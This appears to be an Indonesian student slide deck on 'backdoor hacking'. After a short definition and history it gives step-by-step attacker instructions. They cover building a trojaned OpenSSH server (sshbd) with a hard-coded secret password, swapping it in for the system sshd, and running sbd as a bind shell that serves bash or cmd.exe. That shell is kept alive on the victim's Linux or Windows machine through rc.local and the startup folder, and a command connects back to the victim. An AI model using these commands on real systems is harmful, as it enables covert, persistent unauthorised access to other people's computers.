Backdoor Hacking

advertisement
Backdoor Hacking
Amellia Aquariesta
(7405.040.001)
Abi Sugeng Ariyanto (7405.040.011)
Apa Itu Backdoor ?
 Backdoor atau "pintu belakang", dalam keamanan
sistem komputer, merujuk kepada mekanisme yang
dapat digunakan untuk mengakses sistem, aplikasi,
atau jaringan, selain dari mekanisme yang umum
digunakan (melalui proses logon atau proses
autentikasi lainnya). (Wikipedia)
Latar Belakang
 Backdoor pada awalnya dibuat oleh para programer
komputer sebagai mekanisme yang mengizinkan
mereka untuk memperoleh akses khusus ke dalam
program mereka, seringnya digunakan untuk
membenarkan dan memperbaiki kode di dalam
program yang mereka buat ketika sebuah crash akibat
bug terjadi.
Latar Belakang
 Kenneth Thompson (salah seorang pemrogram sistem
operasi UNIX membuat sebuah program proses login
pada tahun 1983 ketika memperoleh Turing Award),
selain program login umum digunakan dalam sistem
operasi UNIX dengan menggunakan bahasa
pemrograman C, sehingga ia dapat mengakses sistem
UNIX yang berjalan di dalam jaringan internal Bell
Labs.
Backdoor dalam Hacker
 Backdoor dalam dunia hacker memiliki arti mebuat
pintu belakang apabila akan meninggalkan host yang
sudah dimasuki. pintu ini berupa password login.
Backdoor ini berguna apabila cracker ingin kembali ke
host / server tersebut, karena apabila password root
atau admin telah diganti, kita masih bisa masuk
menggunakan password backdoor yang telah
dipasang.
Toolbackdoor
 sshbd
 sdb
SSHBD
 Instalasi sshbd
 asumsi ini setelah kita masuk host target. Extrak file sshbd.tgz.




Edit file version.h
Ubah password backdoor sesuai keinginan anda dengan
melakukan pengeditan pada file includes.h
#define _SECRET_PASSWD "asdfg123"
Setelah semua beres, mulai lakukan installasi misal sebagai
berikut : (Hanya SEMISAL SAJA, gunakan kreatifitas anda oke!!)
#define SSH_VERSION "OpenSSH_4.2"
SSHBD
 [root@target]#./configure --prefix=/usr/local/sshd/ (Tunggu sampai








selesai)
[root@target]#make;make install (Tunggu sampai selesai)
[root@target]#ps -axu|grep /sbin/sshd
Warning: bad ps syntax, perhaps a bogus ‘-’? See
http://procps.sf.net/faq.html
root 3380 0.0 0.6 4272 1576 ? Ss 13:15 0:00 /usr/sbin/sshd
root 4903 0.0 0.2 2032 664 pts/5 S+ 16:56 0:00 grep /sbin/sshd
[root@target]#kill -9 3380;mv /usr/sbin/sshd .
[root@target]#cp /usr/local/sshd/sbin/sshd /usr/sbin/sshd
[root@target]#chmod +x /usr/sbin/sshd;kill -HUP `cat /var/run/sshd.pid`
SSHBD
 Selesai installasi, sekarang coba anda login dari box anda ke box




backdoor dengan
[root@aku]#ssh [email protected] (Ini adalah IP box
backdoor)
password : <enter>
blablabla
[root@target]#
 Password diatas diisikan password backdoor yang diisikan
SBD di Linux --1
 Membuat backdoor di LINUX
 Extract sbd-1.37 (tar –xzvf….)
 make unix
 ./sdb –l –p <port> -e bash –v –ro –Don
 Buat file utk menjalankan backdoor, agar backdoor tetap bisa
aktif meskipun komputer korban di restart. Contoh filenya :
xx.pl:
#!/bin/bash
cd /root/backdoor/sbd-1.37/
(tempat sbd-137 diextract)
./sbd -l -p 123 -e bash -Don -v -r0
 copy-kan isi file xx.pl isi ke /etc/rc.local
SBD di Windows --1
 Membuat backdoor di Windows
 make cygwin
 copy paket sbd.exe
 sdb -l -p <nmr port> -e cmd.exe -v -ro
 Buat file utk menjalankan backdoor, agar backdoor tetap bisa aktif
meskipun komputer korban di restart. Contoh filenya : xx.bat:
@echo off
cd..
//asumsi paket sbd ada pd C:
cd..
sbd -l -p 241 -e cmd.exe -v -ro
exit
 Taruh file xx.bat di startup
SBD
 Menghack lewat Linux dan Windows
 sbd –v <ip_korban> <port>
Download